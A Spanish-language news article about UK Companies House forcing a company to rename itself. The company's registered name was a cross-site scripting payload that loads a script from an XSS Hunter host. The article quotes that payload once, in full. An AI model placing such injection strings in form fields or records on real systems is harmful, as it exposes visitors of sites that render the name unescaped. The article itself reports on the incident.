El registro de compañías en Reino Unido ha forzado a una empresa a cambiar su nombre luego de que detectaran que éste podría representar un riesgo de ciberseguridad. La empresa, originalmente llamada ““><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”, fue fundada por un desarrollador británico, quien asegura que solo quería un nombre divertido para su negocio de consultoría.
El propietario, cuyo nombre no fue revelado, afirma que nunca se dio cuenta de que Companies House, el registro de compañías británicas, era vulnerable a ataques de scripts entre sitios (XSS) usando el nombre de la compañía en cuestión. Esto se debe a los caracteres con los que comienza el nombre de la firma, que podrían ser interpretados de forma errónea por sitios web que no manejan correctamente el código HTML.
Si un sitio web registra erróneamente el nombre, el sitio web lo tomará como un espacio en blanco, lo que permitiría a los actores de amenazas cargar un script del sitio XSS Hunter, que ayuda a los desarrolladores a encontrar vulnerabilidades de esta clase en sitios web.
Aunque el script no habría significado un riesgo de seguridad crítico, los especialistas señalan que es perfectamente posible que los actores de amenazas traten de abusar de este tipo de errores con fines maliciosos. Los equipos de seguridad de Companies House han comenzado a corregir los registros que contienen el nombre original de la compañía, que temporalmente será conocida como “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD” (ESA COMPAÑÍA CUYO NOMBRE SOLÍA CONTENER FRAGMENTOS DE SCRIPTS HTML, por su traducción al español).
Al respecto, un portavoz de Companies House dijo: “Se registró una empresa con caracteres que podrían haber presentado un riesgo de seguridad para un grupo reducido de compañías si llegaran a publicarse en sitios web externos desprotegidos. Hemos tomado medidas inmediatas para mitigar este riesgo y hemos implementado medidas para evitar que ocurra algo similar. Estamos seguros de que los servicios de Companies House siguen siendo seguros”.
Trabajando como arquitecto de ciberseguridad, el se enfoca en protección de datos y la seguridad de datos empresariales. Antes de unirse a nosotros, ocupó varios puestos de investigador de ciberseguridad con diferentes empresas. También tiene experiencia en diferentes industrias como finanzas, salud medica y reconocimiento facial.